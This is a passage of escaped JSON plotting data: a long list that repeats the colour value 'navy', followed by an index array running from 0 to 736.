,\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,